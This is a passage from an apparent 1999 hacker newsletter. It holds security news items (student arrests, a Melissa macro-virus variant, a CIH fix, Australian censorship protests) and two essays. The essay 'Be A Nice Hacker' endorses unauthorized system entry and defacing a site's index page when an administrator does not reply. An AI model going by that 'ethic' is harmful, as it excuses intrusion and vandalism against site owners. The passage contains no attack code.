ahead of the bad guys. Corporate espionage is also a threat, but not in the glamorous way portrayed in the movies. There, the threat is from the inside. There have been many reports of employees purposely sending proprietary information outside the company to other companies, perhaps just before they themselves move to that company. The greater connectivity that employees have today also leads them to inadvertent leaks via e-mail. 14. To what extent is cyberterrorism a genuine concern? There is little motivation for industrial control systems like those running nuclear plants or airports to be on the open Web. They may have dial-up access or private networks within the organization that would be susceptible to attack from the inside. IBM has found that it can be quicker and cheaper to attack a target physically, rather than digitally -- we've nonchalantly walked into businesses, snooped around, and walked out with confidential material (once with the security guard holding the door for us!). And there are many examples of unfortunate accidents that resulted in very effective "attacks." The most common example is the "backhoe attack," where an errant heavy-equipment operator accidentally cut a communications cable. ... I don't think we are "at war," because in this problem the enemy includes ourselves. We view it more as a race -- we're all trying to stay a few steps ahead of the threats ... through improved education and technology. ... The good news is that people are thinking about these issues, and some groups appear to be taking action. 15. What about responses such as the recent Pentagon counteroffensive that redirected hackers' attack to an applet that caused their browsers to crash? Is that an appropriate response to hackers? Anytime you acknowledge the hacker, you run the risk of heightening his or her interest. If you change the game from solitaire to a real poker game with human opponents, it becomes more interesting to most hackers. Such retaliation is also short-lived, since countermeasures will quickly be developed and publicized around the Web. In my opinion, this is not an effective usage of limited security personnel. 16. Are anti-hacking measures improving? The most important improvement is in the area of awareness. ... Advances in firewall technology (making them easier to install and configure), improvements in vulnerability scanning and better explanations of how to repair them, and better intrusion-detection with fewer false-positives are all key technologies in this race. 17. If attacks can only take place on computers that are online, to what extent could hacking be mitigated by keeping sensitive materials, data, etc., offline? One of my colleagues at IBM likes to say, "only trust physics." My version is that the only 100 percent, truly secure system is one that is powered-off and filled with concrete. The military has long understood the security of an "air gap" (where a secure machine has no connection whatsoever to an unsecured machine), and we recommend to our customers that they consider such an arrangement for their most secure systems. This comes down to risk-analysis -- that is, weighing the cost in convenience and availability against the threat of having a system online. If it's important to ... your business to have data available online inside the company, then protecting it with an internal firewall makes sense. ... If you have a Web server you want your customers to access, you can't hide it behind your corporate firewall because they won't be able to get to it. There are network designs that will enable you to position the Web server on the "outside," while securely maintaining a connection between it and, perhaps, a server behind the firewall. 18. What is the long-term outlook for hacking? As long as there are unsecured computers with interesting stuff on them, there will be hackers. Law enforcement agencies have stepped up their facilities and training programs to meet the demand for computer and network security. Moving toward technologies that use strong encryption will greatly improve the overall security of systems. Virtual Private Networks are a fantastic tool for companies and governments to protect their systems and networks while taking advantage of the low-cost, high-availability offered by the Internet. Internet standards bodies are also moving toward designing security into new standards. Most kids today know much more about computers than their parents do, and some start "messing around" at earlier ages than in the past. The best thing we can do is to show them how interesting it can be to work at protecting systems and networks. 19. What about the outlook for computer security? While better security technologies are appearing all the time, education and awareness will continue to be the limiting factor. System administrators must learn about and maintain their systems securely. Users have to understand their security responsibilities (like choosing good passwords, not installing unauthorized modems, etc.). ... Innovations like biometrics and smart cards will go a long way toward making security easier for the end user as well as for the system administrators. @HWA 20.0 Five Busted in Florida ~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by squid stupid It has been hard to nail down specific information but a few local news outlets in Florida are reporting that four students of Flagler Palm Coast High School may face a slew of criminal charges for unlawful computer access. The suspects have been accused of deleting grade files and compromising exams on their school computer system. Yahoo News http://dailynews.yahoo.com/headlines/local/state/florida/story.html?s=v/rs/19990526/fl/index_6.html#11 Student Hackers Arrested - (BUNNELL) -- Five Flagler Palm Coast High School students... including the son of a Bunnell city commissioner... are facing a litany of criminal charges after allegedly using a computer virus to hack into the school's network and commandeer files. No grades were changed but grade files were deleted and exams compromised. The virus was discovered last month during a software upgrade. The school's computer experts also found that each of the five students had downloaded a ``hacker tool'' from the Internet into their personal computer accounts. They're been suspended for the rest of the year... but the students will be allowed to take their final exams next month. Prosecutors have not decided if they will file criminal charges. From ISN mailing list Date: Thu, 27 May 1999 02:58:09 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] Five arrested for hacking into high school system Forwarded From: bluesky@rcia.com May 26, 1999 Five arrested for hacking into high school system By MATT GOWEN BUNNELL - Five Flagler Palm Coast High School students - one the son of a Bunnell city commissioner - are facing a litany of criminal charges after authorities said they used a computer virus to hack into the school's network and commandeer teacher and student files. Flagler County sheriff's deputies arrested the students Monday. All five were taken to the Division of Youth Services in Daytona Beach before being released to their parents. Facing the brunt of the allegations are Steven Alverson, 17, and Daniel Bixby, 16, both of Palm Coast. Alverson was charged with 16 separate felony counts, eight for crimes involving computers and eight for crimes against computer users. Bixby was charged with 12 similar counts. Alverson and Bixby were suspended until the end of the school year, June 4. Arrested on two felony charges each were Yen Chen, 16, and Henry Cervantes, 17, both of Palm Coast, and Daniel Dupont, 17, of Bunnell, son of City Commissioner Catherine Robinson. School officials gave Chen, Cervantes and Dupont in-school suspension until the end of the year. The five will be allowed to return to take final exams June 7 and 8. As for the criminal case, the State Attorney's Office will now decide whether formal charges should be filed. The arrests capped a lengthy investigation into the presence of the virus - a disabling computer program that gave the students access to teacher grade books and to exams on the system, according to reports. The virus was initially discovered April 8 by technology support personnel who were upgrading the school's protective software. In a subsequent investigation, reports said, the school's computer experts found that each of the five students had downloaded a "hacker tool" from the Internet into their personal computer accounts. FPCHS Assistant Principal Allan Haller said no grades were changed but that grade files were deleted and exams were compromised. "It was more mischievous than anything else," Haller said. Still, he said, the high school's computer network connects to the districtwide system, meaning the students could have eventually broken into financial and payroll records or general personnel files. "It could have been very disruptive," Haller said. "They could have shut down the whole system." The arrested students either preferred not to comment or could not be reached for comment. Robin Alverson, Steven Alverson's mother, said her son insisted he was innocent of any criminal wrongdoing and offered to take a lie detector test or voice-stress analysis to prove it. "Steven is very computer literate," Robin Alverson said. "He is not stupid. He knows that anything he does on there can be traced. That's the thing that gets me." One of their classmates, who asked not to be identified, said he thought the group had simply downloaded games off the Internet and that one had a virus attached to it. But sheriff's reports describe a highly technical process - set in motion Jan. 4 - involving hidden and renamed viruses that blocked administrators' access to their files, making the path more difficult to trace. "These students were very good," Flagler County School Superintendent Robert Williams said, alleging that they viewed breaking into the system as a challenge or game. "They were running our people ragged trying to keep up with them." Williams added that it was the first time the district has dealt with unauthorized internal computer access, and that the disciplinary code will be revamped accordingly over the summer. The high school has four classroom computer labs, and Haller estimated the school has more than 100 computers that connect to the Internet. In the fall, each student is given his or her own password-protected computer account to do research or work on word processing programs. Students and parents must sign an agreement on proper use. "Some of them choose to use their talents inappropriately," Haller said, adding that peer pressure may have played a role. "Whether it's a macho thing, whether it was a battle over school territory or whether they were out to prove a point - 'We're smarter than you' - it's hard to say." And as recent news reports demonstrate, even large agencies such as NASA are not insulated from the potential for break-ins. "We're a high school," Haller said. "We don't begin to have the kinds of resources that the federal government has for protection." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 21.0 Danes Finger Swede for Cracking 12,000 Systems ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Phoz The Danish Police Computer Crime Unit have exposed a 17-year old from Sweden claiming that he broke into at least 12,000 computers worldwide, including military, bank, and university owned systems. The reports indicate that he used an automated version of a BIND vulnerability to gain access and has been compromising systems since early 1997. phoz.dk- Translated News Reports. http://phoz.dk/news/260599.html @HWA 22.0 EFA Plans Net Censorship Demonstrations From HNN http://www.hackernews.com/ contributed by photon The Electronic Frontiers Australia have announced several protest events to take place on Friday May 28. Local groups around Australia have been urged to co-ordinate protests against government censorship. Australia's proposed internet censorship legislation passed the Senate on Wednesday, and is expected to pass through the House of Representatives some time next week. Electronic Frontiers Australia http://www.efa.org.au Broadcasting Services Amendment (Online Services) Bill 1999 http://www.ozemail.com/~mbaker/amended.html List of Australian Representatives http://www.aph.gov.au/ Sydney Morning Herald http://www.smh.com.au/news/9905/27/pageone/pageone7.html Thursday, May 27, 1999 Internet providers plotting revenge over bill By LAUREN MARTIN, in Canberra Angry Internet service providers turned on the Government after its bill to censor the Internet passed the Senate yesterday. Requests from Government computer users were diverted to a protest page which made the users wait 120 seconds before reaching their desired destination. "Get used to the delay," came the message. It was a warning that the plan would slow the system. Civil libertarians also protested by turning their computer Web site screens black to mark their belief that the Government had - in the words of Democrats Senator Natasha Stott Despoja - "turned its back on the Internet". Anti-censorship group Electronic Frontiers Australia is organising nationwide rallies for tomorrow in the real world - Sydney, Melbourne, Perth, Brisbane, Adelaide and Wollongong. One family-owned Internet provider in western Sydney, RP Internet Services, yesterday was offering a month's untimed calls or 500 megabytes of data for clients who showed up. The company hopes to hire a hearse for the Sydney protest, which will move from Hyde Park to the offices of the Australian Broadcasting Authority and the Office of Film and Literature Classification. Already one West Australian-based ISP had sent each senator a copy of George Orwell's 1984, with a note: "The Online Services Bill is Orwellian in its implications. It has no place in a free society." But the bill is expected to move smoothly through the House of Representatives and become law. It outlines a complaints-based regime under which the ABA can force Internet providers to remove material which would be considered offensive or illegal under film and video guidelines. If the material is not removed within one working day, ISPs face penalties of tens of thousands of dollars. The chief executive of the Internet Industry Association, Mr Peter Coroneous, said the bill represented a "huge challenge". "This has never been attempted anywhere in the world before, and people must realise that we cannot necessarily come out with a magic bullet tomorrow." The Communications Minister, Senator Alston, said the bill would "protect Australian citizens, especially children" from unsuitable Internet sites. But EFA president and Internet lawyer, Mr Kim Heitman, said it would not protect anyone. International sites (more than 90 million) could not be effectively blocked, he said. Adult sites based in Australia would move offshore or underground. "The internet is going to effortlessly evade the bill," Mr Heitman said. "It does nothing but make us an international laughing stock for saying we can do the impossible - it's a con job ... "If the Government was serious about Internet content, they would pay to educate parents and give police the resources to hunt down people who create illegal content." @HWA 23.0 Design Principals for Tamper-Resistant Smart Card Processors ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Silicosis The Advance Digital Security Research Department of the University of Cambridge Computer Laboritory has released an excellent paper on the security weaknesses of smart cards and describes several methods of extracting protected data and software from smart card processors. Anyone who has been doing any smart card hacking should probably read this. Design Principals for Tamper-Resistant Smart Card Processors http://www.cl.cam.ac.uk/~mgk25/sc99-tamper.pdf @HWA 24.0 Melissa finds a mate ~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Melissa will not Die contributed by nVirb Variants of the word Macro virus known as Melissa continue to appear. This time the mutant disguises itself in a '.rtf' named document as opposed to '.doc' which helps to hide it from anti-virus software. It has been speculated that Melissa and a virus known as CAP discovered in 1997 may have met in the wild and mutated together. PC World http://www.pcworld.com/pcwtoday/article/0,1510,11162,00.html Melissa Mutant Appears Virus variation is disguised as an RTF file and hides from vaccines. by Matthew Nelson, InfoWorld Electric May 27, 1999, 3:55 a.m. PT The Melissa virus, which swept across networks around the world last month, has popped up again in a mutated format, which may have occurred when it came into contact with another virus. Melissa's latest variation uses a macro virus to replicate itself across networks as the original did, but now it changes the file extension of the Word document from .doc to .rtf. This may effectively camouflage the virus from antivirus systems that look only for the .doc version of the attack. The virus is not actually an RTF document, but is a Word file masquerading as an RTF file, as RTF files cannot contain macros. "An RTF file cannot contain macros, so it cannot contain macro viruses," says Sal Viveros, group marketing manager for Total Virus Defense at Network Associates, which was contacted about the virus by a user. "But with Word you can name your extensions any name you want, so all this virus writer did was change the list.doc in Melissa to list.rtf." Mutating in the Wild? The RTF Melissa virus is similar to the CAP virus, which was discovered in 1997 and altered .doc files to .rtf files. CAP was summarily added to antivirus application lists to guard against. But given the similarity of the two viruses, and the possible results of an interaction between the two, Viveros speculates that the two viruses might have met and mutated in the wild. If a system infected with CAP virus also contracted Melissa, then CAP could have altered the Melissa files to replicate as RTF files and then continued to spread the infection. "It could have been that someone had the CAP virus on their system who got infected by Melissa," says Viveros. "Maybe it was accidental that this was changed to RTF." There is no way to be sure, Viveros adds. This new version of the Melissa virus is one of many copycat viruses discovered since the initial outbreak of the virus. To protect against the latest version of Melissa, Network Associates and other antivirus vendors recommend that you update your antivirus data definitions regularly and be cautious opening suspicious messages, especially ones fitting the Melissa profile of "Important message from ..". @HWA 25.0 punkz.com sets up a feedback page for the presidential 'cyberwar' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ The Internet a Tool of War? contributed by simonsays Should the United States use the Internet as a tool of war? A page has now been set up where you can email the President with your concerns in response the allegation that the CIA will break into various banks to mess with official Yugoslavian bank accounts. punkz.com/sixtoed @HWA 26.0 Its that time of month again, when the 26th rolls around, look out... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I thought we already had a fix for the CIH virus but apparently the Aussies want in on the action as well so heres yet another one...-Ed Chernobyl Virus Cure Found in Australia contributed by nvirB With the 26th of the month arriving quickly developers have been scrambling to create a fix for variants of the CIH or Chernobyl Virus which may strike tomorrow. CIH attacks a system by corrupting both the the File Allocation Table and the BIOS. Developers in Australia claim that they have created a program that will rebuild the FAT table of an infected system. However, they have been unable to solve the BIOS corruption problem. News.com.au http://technology.news.com.au/techno/4286612.htm Local developer nukes Chernobyl bug By IAN GRAYSON 25may99 A QUEENSLAND software expert has developed a fix for the malevolent CIH virus, which corrupts hard drives, making PCs inoperable. The virus, dubbed Chernobyl because it struck on the anniversary of the nuclear accident, hit hundreds of thousands of PCs worldwide on April 26. CIH virus outbreaks have been most prevalent in the Asian region. Some experts say this is because of the large amount of pirated software in use there, and the fact that many CDs were infected at the time of manufacture. A variant of the virus has been found that will trigger tomorrow, and could continue to strike on the 26th of each month until it is removed from a system. Virus expert with Queensland firm Hamilton Multi-media, James Wallis, said he had created a fix that overcame the impact of the virus, allowing users to access data on their hard drives. "We sat down and figured out exactly how the virus corrupts the disks and set out to develop a way to fix it," he said. Mr Wallis said it took six 14-hour days to create the fix. The company has made the fix available as a free download from its Web site. He said the virus could be beaten because only data in the first portion of a hard drive, including the file allocation table, was corrupted. The remainder was left intact but inaccessible until the lost section was rebuilt. "Our program starts at the end of the disk and works backwards," he said. "Using sophisticated algorithms, it recreates the data at the beginning of the drive." Mr Wallis said the fix had been used successfully to resurrect more than a dozen infected hard drives brought in by customers. More than 180 copies of the fix had been downloaded from the Web site in the week after it was made available. But Mr Wallis said little could be done for PCs in which the virus had also attacked the BIOS chip. "In many cases it is a matter of having to replace the chip because there is nothing that can be done in software to fix it." 27.0 Submission: "Be A Nice Hacker" by System ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ be a nice hacker... by system ( 21st may 1999). -------------------------------------------------------------------------------- [ Introduction. ] I made this articles because there are so much cracker than a real hackers in Indonesia and all over the world. -------------------------------------------------------------------------------- [ General description. ] A hacker is a people that can enter into some computer system without anybody know about it. Generally a hacker do not intend to publish this interruption to the internet communities, they don't like publication, they only want tray their security, isn't it good or bad. If they found their security is bad or weak, they will tell the administrator, tell them that there is a hole in their system, and suggest the administrator to fix it before something bad happening to their system. But with these days, this things were being forget by them who call their self a hacker. There are so many hacking / cracking scene that only for publication purpose at this time. They don't obey the ethics that in behind of underground world. -------------------------------------------------------------------------------- [ A details description. ] Being a hacker, they must remember one thing " DO NOT INTEND TO BREAK THE SYSTEM ". We must keep this thing in our self, if you are the real hacker of course. A hacker, that I'm already tell you in the front of this articles, only get inside the system, looking around, if they find any hole in the system, they will tell the administrator the hole. The hacker never break or change the data's that inside that system. Even if they have a capabilities to break and change that data's, but look, they only look, read, study it, if it is good for their self they keep it on their mind, if not they leave it with out a trace. I know this is probably sound pretty boring for you guy's that just get into this scene, and sometime the question that exist in your mind is " So what's the benefit for me ? ". Well, the benefit is the knowledge that you get, a hacker never do something for their own purpose. They only study and study for getting a lot of knowledge. So what the deals with this knowledge ? To answer this question, you must look something that surrounding you. Let we see the easy one, the monitor, the keyboard, the cpu, the mouse that you using right now, where it come from ? From the science's isn't it ? Where science's come from ? From the knowledge isn't it ? Knowledge is the most important thing in this world, and I believe all knowledge will be use, maybe not at this time, but it will in the next couple years or more. Try to thing objectively, in old time Leonard Da Vinci has paint how the helicopter works in his note pad, as all of you know at his time people even don't have any prescription about a flying copter. But in a few years later, that could be happened like know. You see, that the real value of a knowledge's. To bad, these value of knowledge's has been forgotten just like that, many of our pal's from Indonesia more like to break the system and change the data's that exist on it. One thing that really occurred in Indonesia is they only want getting the free internet account than the knowledge's. If this still happen in the next couple years, what is the main purpose of internet ? I tell you these for not make a certain people happy, but this negative phenomenon should be get away from Indonesia, because Indonesia people can not think smart if they keep using the internet in a wrong way. Some people tell me that this is an equal position, because the telephone and internet fee in Indonesia is very expensive if we compare it with the other country. Yes this is true, but this is a wrong thinking. Don't look from one side, but look at two side or more. If you are in the ISP and Telephone side, you will see what happening to them. They will broke if you still do this. Okay, back to the main subject. Why Indonesian hacker like to break the system ? I don't sure for 100%, but I think this is happen because they lack of information, especially the ethics in underground world. It is our job to tell them so they this is will not happen again in the future. I'm not a hacker, but I will they you some ethics that I know : - Do not break the system - Do not change the data's that exist on the system - Tell the administrator the hole that you have been found - Don't even try to delete all files in their system. ( If in Web server, please don't delete all HTML / Scripts in their directory, if the administrator doesn't respond your email, change the index.html with your own word, but keep the old one, rename the old one, for example oldindex.html, as I know this only happen if the administrator not respond your email in 48 hours ). - And for the administrator, your also need to obey the ethics. Keep the hacked version index.html for 24 hours. Let me tell you, if you obey these ethics, people will regret you, even you could be a friend with the administrator for no time. -------------------------------------------------------------------------------- [ Summary. ] - Being a hacker doesn't mean you will be famous in a short time. - A hacker jobs is not an easy way. - A hacker with out the ethics is just a looser mind. - Remember, hacker only purpose is for knowledge. ################################################################## This article is a translate version of " Jadilah hacker yang benar " that made by System, at Friday 21st May. You can use this article / change it as you like, as long as you give me some credit. I really like all comments / suggestion from you, please email it to system@hackerlink.or.id. Check out http://www.hackerlink.or.id for Indonesian underground news center. ################################################################## @HWA 28.0 Hacking Memes by Stephen Downes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Pasty Drone, NewsTrolls Hacking Memes (Viewing this article is illegal in Australia) This essay is about subversion. 1. The Essence of the Meme The concept of the meme has been working its way around the web for a while now, instantiating itself in Wired's regular feature, Hype List, in articles, and in general currency. As David Bennahum writes at the top of each issue of Meme, a meme is a contagious idea that replicates like a virus, passed on from mind to mind. Memes function the same way genes and viruses do, propagating through communication networks and face-to-face contact between people. The tune you can't get out of your head, the phrase you keep using in your conversation, the image of the perfect donut - these are all memes, ideas which have passed from somewhere out there into your head and into your consciousness. Transference is the essence of the meme. Principia Cybernetica Web defines it as "an information pattern, held in an individual's memory, which is capable of being copied to another individual's memory." The Hacker's Dictionary defines it as "An idea considered as a replicator, esp. with the connotation that memes parasitize people into propagating them much as viruses do." The concept, we are told, originates in Richard Dawkins's 1976 book The Selfish Gene. The word 'meme' sounds like 'gene' and has similar properties. Humans, from the point of view of either gene or meme, are the means by which genes - or memes - are propogated. Animals, plants, and even ourselves, are merely their disposable "survival machines". Our human capacity to communicate consists in our ability to transfer idea from one person to another. Not to say that such transference is perfect. We all know the story where the message gets changed as it is whispered ear to ear down a line of people. But it is reliable. Most of the time, the receiver gets the information the sender wanted to convey. Different forms of communication operate more or less effectively. A casual conversation you have on the bus will be forgotten by day's end, while this essay may linger in your mind a few days longer. Neither conversation nor essay, however, has the staying power of the McDonald's jingle (sing it with me: You deserve a break today...). Mere transference is not sufficient. For an idea to take hold in another person, it must be internalized, it must be what Dreyfus and Dreyfus call the expert, or intuitive, state of knowledge. From the standpoint of humans, ideas are the currency of the information economy. An idea which replicates well is worth money, because the idea that implants itself of intuitive knowledge acts as a determinate of behaviour. The best way to get a person to buy your product or to use your service is to internalize it, to make dialing 10-10-800 an action. In advertising it's an old rule of thumb: mention the product name three times in a 15 second spot. As Andrew Garton laments, The record industry maintains its status in the global economy and its income streams by way of repetition. Music that is played over and over again so much that it creates its own audience that in turn purchase its representation to listen to it over and over again in their homes, their cars, walkmans, bathrooms... anywhere one can think to place a speaker. Ideas - and not just advertising - transmit themsleves through repetition. Hacking Memes 2. Advertising Repetition alone worked in the old days of limited media. When the sources of information were few and uniform, when there were three networks and one message. Today's consumers are not only more sophisticated - merely making them remember is no longer enough - consumers are the battleground for information wars, with messages flying at them from all directions. Drive down any city street and look at the images: one in ten (if you're lucky) is an actual traffic signal; the rest are trying to implant some idea, some behaviour, into your mind. Advertising today looks for stronger hooks, and it finds them in association and self-identification. The concept is especially simple: find (or define) a person's conception of self which is is pleasing. Mold that conception such that the use of a product or service is essential to that conception. Imprint the idea that in order to be yourself, you need to purchase such-and-such a brand. Nike, for example, understands this. After losing market share to Reebok, Nike's new advertising campaign focussed less and less on shoes and more and more on image. As Randall Lane explains in a recent Forbes article, Nike's Phil Knight isn't selling shoes. He's selling attitude.... Nike would sell not shoes but the athletic ideals of determination, individuality, self-sacrifice and winning.... Nike ads almost never pitch product--or even mention the company's name. They create a mood, an attitude, and then associate the product with that mood. Call it image transfer. Cool ads, cool product. As Wieden puts it: "We don't set out to make ads. The ultimate goal is to make a connection." The idea behind Nike's ads is to transfer a sense of identity from the person to the product. Hacking Memes 3. The Corporate Pitch People living in western democracies are flooded with advertising. The illusion is sustained that they are being offered choice, but in reality, they are being presented with a uniform message. Western society does not consist of many cultures, rather, more and more, they are being subsumed into a single culture. The reality of this hit home for me when I found myself listening to - and enjoying - Meredith Brooks's recent top 10 song, Bitch I realized I was watching an advertisement for the movie Practical Magic. Brooks's song - fresh, rebellious, catchy - was appropriated and incorporated into the larger media package. Indeed, it seems that most popular music today ties in with a movie or television show - and that most movies and television shows tie in with additional product lines. These tie-ins define not only the breadth but also the limits of popular culture. Even rebellion is commodified - if it is not commodified, it is not shown. 'Culture' in our society, both from the popular point of view and even in academic studies - means 'mass culture', as defined by the tightly woven network of the mass media meme. As author and pundit Carrie McLaren complains: The real disappointment lies in (scholars') abject inability to recognize 'popular culture' anywhere but in the officially-sanctioned showplaces of corporate America; their utter dependence on television to provide them with an imagery of rebellion. Or as Mark Dery observes in his classic essay, Culture Jamming, Corporate ownership of the newsmedia, the subsumption of an ever-larger number of publishing companies and television networks into an ever-smaller number of multinationals, and the increased privatization of truth by an information-rich, technocratic elite are not newly-risen issues. More recent is the notion that the public mind is being colonized by corporate phantasms---wraithlike images of power and desire that haunt our dreams. Hacking Memes 4. Hyper Reality Steve Mizrach, Culture Jamming: The Information War of the 90s: the French philosopher Baudrillard calls our postmodern existence "hyperreality." Real experiences and things have been replaced with simulacra - copies without an original. Due to the power of mass media advertising, our relationship to the signifier has changed. Now it hides the absence of a signified: conceals the inability to deliver real satisfaction by cleverly simulating it. Part of our hyperreal lives is the fact that our simulations are more real than real. Given a better imitation, people choose it over the real thing; hence Disney's Matterhorn enjoys more visitors than the real one in Switzerland. More insidiously, through various obfuscations, people come to think the simulacrum is the real McCoy, and forget about the historical and physical reality it represents. Modern advertising critics like Mark Crispin Miller often note the hidden messages concealed within the cool graphics and media saturation of Madison Avenue and MTV. Originally, they suggest, advertising often connected the product being sold with some sort of self-image or way of life (pastoral, pleasant, family-oriented.) Often, it was conveyed that the product would somehow confer various advantages - popularity, sexiness, fame, success, power, even individuality. Today, ads are filled with a strange sort of rugged selfishness, misanthropy, and mean-spiritedness ("touch my doritos and die.") A person is told sternly to buy as much as they can of the product but never to share with friends. "Get your own," they're told. While various moral crusaders seek to combat the various sexual innuendos of TV programming, they rarely challenge the more subtle but socially disruptive images found in commercials and other advertising. The product, no longer able to offer satisfaction on its own ground ("a potato chip is a chip is a chip"), instead offers the consumer a chance to be part of a certain 'crowd' or 'scene.' They belong to a cool "product tribe," revelling in the image and sensibility that the product somehow mystically confers - the fetishism of commodities, hyperaccelerated for Generation X. Analysts of postindustrial America suggest this is the secret hidden within these advertising campaigns - that more and more people are being sold style, image, and celebrity, since there is no substance or material satisfaction to the product-in-itself. Concealed within the jump-cut flash of postmodern advertising is a simple code: consumption is a mode of transcendence, a way to take part in something larger than yourself, "the Pepsi Generation." Corporations utilize various techniques to carve Americans into various market profiles - not based on what products they use, but on what media messages they respond to. In other words, they are to be sold on the images they want to project to themselves and others, and not on the intrinsic usefulness of consumer items. Whatever values they supposedly respond to, are translated into clever pitches, suggesting that the product somehow represents or embodies those values. Subliminal seduction has never been that important in advertising, despite the hype, but the use of semiotic strategies certainly has. Products are often "pitched" to specific ethnic groups, minorities, or sub-cultures, often using the Marcusian co-optation strategy of appealing to their own sense of difference or deviance. ("Wear our clothes, and then you'll be a real rebel.") Hacking Memes 5. The Information War Jesse Hirsh: didn't you hear? they've declared information war against everybody. yep, that's right, the digital economy is really the perpetual war economy. Like genesis the great flood is on, only we're the ones being flooded, or rather bombarded by information, seeking our conversion to the holy faith of consumerism, otherwise known as virtual reality. and of course in declaring war the state has identified its enemies and scapegoats: hackers, phreakers, and anarchists, all of whom are presumed terrorists. We tend to think of the media message as pertaining to products and services only, and to restrict our concept of the tie-ins to toys, clothing, and running shoes. But the uniform image being broadcast extends well beyond consumer purchases; it is devoted to creating and maintaining the consumer society. No element of life is sacrosanct; all elements of society are infused. On the one hand, non-corporate forms of information - any information - are attacked. In some cases, the strategy is straight-forwardly political. Herbert Schiller, as quoted by Dery: The commercialization of information, its private acquisition and sale, has become a major industry. While more material than ever before, in formats created for special use, is available at a price, free public information supported by general taxation is attacked by the private sector as an unacceptable form of subsidy...An individual's ability to know the actual circumstances of national and international existence has progressively diminished. In Canada and other nations, we see this as the incessant attacks on public broadcasting networks such as the Canadian Broadcasting Corporation. On another front, it involves attacking the integrity and credibility of alternative news sources. A recent National Post article on the CBC's coverage of biotechnology is typical. The author, Terence Corcoran, writes scathingly, Ideology certainly dominated CBC Radio's This Morning show yesterday. Reporter Don Carty is a smooth-talking manipulator of words who gives his slanted reports a thin veneer of objectivity. The corporate culture strives for the middle ground, to portray themselves as objective and neutral; any position from outside that camp is ridiculed as "biased" and "political". Alternatively, public media can be co-opted. Hence, for example, the sale of the educational Access Network by the Government of Alberta to the CHUM Media Group. Or the infiltration of the American Public Broadcasting System by corporate interests, with - as Carrie McLaren observes, inevitable results: In the wake of the Disney/ABC merger, a Young and Rubicam (huge advertising firm) survey of 8,500 brands worldwide concluded that the most eligible brand for acquisition is the Public Broadcasting Service. Surprise, the home of "educational" programming like Barney and Nova is one big non-commercial commercial. Says PBS spokesperson Stu Kantor, "In terms of differentiation and personal relevance, it is the No. 2 (behind Disney) media brand among the total population." The mainstream media's fostering of a sanitary corporate image extends well beyond news and advertising. Situation comedies, dramas and movies - the mainstream of 'popular culture' - are plagued with product placement and are passed through the image scrubber before they air. The NBC's handling of Atomic Train is typical of the many instances reported by the Student Activists' Network Wayne Grytting, After heavily promoting the movie's factual basis, NBC suddenly changed its mind with "no input" from its parent company, GE, a big investor in nuclear power. Alerted to the "fact" that nuclear wastes are not transported by trains, they added a disclaimer emphasizing the movie's fictional character which they showed at every commercial break. Then they overdubbed every mention of nuclear waste with the phrase "hazardous waste", thereby achieving the look of a dubbed Japanese horror film. The image of the world that we receive through popular culture - whether in music, in the cinema, or on television - is a carefully polished version of reality. Mark Dery: The commercialization of information, its private acquisition and sale, has become a major industry. While more material than ever before, in formats created for special use, is available at a price, free public information supported by general taxation is attacked by the private sector as an unacceptable form of subsidy...An individual's ability to know the actual circumstances of national and international existence has progressively diminished. As the band Negativeland writes, It is simply inconceivable that this daily, never ending stream of public suggestion and desire creation has no effect or influence on our spirits, our health, our jobs, our laws, our environment, our culture, our political process, or our national and international policy. Hacking Memes 6. Control of the Classrooms The battle extends to all corners of the information nation, even into the sanctity of the kindergarten classroom. Knowing that repetition and imprinting are key, advertisers are keen to infuse their message into the curriculum. Advertisers, for example, recently placed their product in mathematics textbooks. "This looks like product placement, as they do in the movies," said David Walsh, director of the National Institute on Media and the Family, based in Minneapolis, which studies the effect of advertising on families. "The effect is the same. It gets at what I call the golden rule of influence, which is when the person being influenced doesn't even know it." Media groups such as Channel One place television news shows into classrooms. As they say on their website, Channel One News is a daily, televised, 10-minute newscast that is beamed via satellite during the school year to each of the 12,000 schools in the Channel One Network community. Channel One News features stories on breaking news and in-depth issues that affect the world, the nation and specifically America's teenagers. Leaving aside the question of advertising in education, an examination of what Channel One considers "news" is revealing. Today's (May 27, 1999) edition asks students how they liked Star Wars, covered Alannis Morisette, commented on body image, and reported "Live from Mt. Everest". The message broadcast to students on Channel One is clear: our culture is defined by the movies and music we see and hear, our culture is the best, and the best path to self-actualization is to immerse ourselves in this culture. Listen to Channel One on freedom in China: Behind the Chinese government's restrictions are cultural and historical factors. For thousands of years, Chinese culture has been based on Confucian values, which people have a respect for authority. The ruler of the people is a father figure whom everyone must obey. The Chinese government's existing authoritarian style of leadership follows the ancient way of emperors who ruled China with "the mandate of Heaven." Individualism is not highly valued in Confucianism. Instead, people are encouraged to act in the best interest of the family and community. The Chinese culture, according to Channel One, is inherently and irredeemable evil, based on authortarian "Confucian" values. Such an account misrepresents both Chinese culture and Confucianism. By contrast, the American culture is painted in pure tones, America was founded by English colonists who wanted independence from Great Britain. The United States also has become a haven for immigrants fleeing religious and ethnic persecution in other countries. Because of these historical events, individualism and freedom is highly valued in American culture. Here we have not only an assumption of genetic and racial purity, we also have a conflation of "freedom" and "individualism". And - leaving aside the fact that the dominant religion in the United States - Christianity - is at least as authoritarian as Confucianism, the 'fact' of freedom in the United States is traced to its religious roots. Advertisers have long known that imprinting is best accomplished though marketing to kids. The battle for the airwaves and print media has been won. The battle for the classrooms of the nations is just being engaged. Hacking Memes 6. Control of the Classrooms The battle extends to all corners of the information nation, even into the sanctity of the kindergarten classroom. Knowing that repetition and imprinting are key, advertisers are keen to infuse their message into the curriculum. Advertisers, for example, recently placed their product in mathematics textbooks. "This looks like product placement, as they do in the movies," said David Walsh, director of the National Institute on 